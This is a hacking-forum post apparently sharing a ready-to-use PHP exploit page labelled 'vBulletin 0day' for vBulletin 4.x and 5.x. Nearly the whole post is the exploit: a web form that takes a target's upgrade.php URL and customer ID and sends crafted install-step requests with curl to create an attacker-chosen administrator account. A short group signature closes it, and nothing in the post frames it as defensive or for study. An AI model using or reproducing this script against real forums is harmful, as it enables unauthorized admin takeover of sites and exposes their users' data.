HackerTop - View topic - vBulletin v4.x.x and 5.х.x Shell Upload / Remote Code Execut
View unanswered posts | View active topics It is currently Wed Dec 19, 2018 10:00 am



Reply to topic  [ 1 post ] 
 vBulletin v4.x.x and 5.х.x Shell Upload / Remote Code Execut 
Author Message
Site Admin
User avatar

Joined: Sun Jul 24, 2016 6:44 am
Posts: 18
Reply with quote
Attachment:
vb.jpg
vb.jpg [ 15.42 KiB | Viewed 2421 times ]



Code:
<html xmlns="http://www.w3.org/1999/xhtml"><head>
 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 
<title>vBulletin 0day</title>
 
<style type="text/css">
 
<!--
 
body {
 
background-color: #000;
 
text-align: center;
 
color: #063;
 
font-size: large;
 
}
 
.a { font-size: 24px;
 
}
 
.f { color: #060;
 
}
 
.gbf { color: #F00;
 
}
 
.dd {
 
color: #F00;
 
}
 
.w {
 
font-size: large;
 
}
 
a:link {
 
text-decoration: none;
 
}
 
a:visited {
 
text-decoration: none;
 
}
 
a:hover {
 
text-decoration: none;
 
}
 
a:active {
 
text-decoration: none;
 
}
 
-->
 
</style></head><body>
 
<p class="a">
 
 
<h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
 
<br>Created by: 1337
<br>Found on: 08/22/2013
<br>Website: http://www.madleets.com
</p>
 
<br>
<?php
//extract data from the post
if(isset($_POST['submit'])){
extract($_POST);
//set POST variables
$url = $_POST['url'];
$fields = array(
'ajax' => urlencode('1'),
'version' => urlencode('install'),
'checktable' => urlencode('false'),
'firstrun' => urlencode('false'),
'step' => urlencode('7'),
'startat' => urlencode('0'),
'only' => urlencode('false'),
'customerid' => urlencode($_POST['customerid']),
'options[skiptemplatemerge]' => urlencode('0'),
'response' => urlencode('yes'),
'htmlsubmit' => urlencode('1'),
'htmldata[username]' => urlencode($_POST['username']),
'htmldata[password]' => urlencode($_POST['password']),
'htmldata[confirmpassword]' => urlencode($_POST['password']),
'htmldata[email]' => urlencode($_POST['email'])
);
//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
//execute post
$result = curl_exec($ch);
//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
<span>Website:</span>
<input name="url" type="text" tabindex="1" size="60" />
<br>
<span>Customer ID:</span>
<input name="customerid" type="text" tabindex="2" size="40" />
<br>
<span>Username:</span>
<input name="username" type="text" tabindex="3" size="40" />
<br>
<span>Password:</span>
<input name="password" type="text" tabindex="4" size="40" />
<br>
<span>Email:</span>
<input name="email" type="text" tabindex="5" maxlength="40" />
 
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>
 
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
 
<p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
 
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
 
 
</div>
 
</pre>
 
<p class="a">&nbsp;</p>
<p align="center">
 
 
</body></html>


Sun Jul 24, 2016 12:04 pm
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB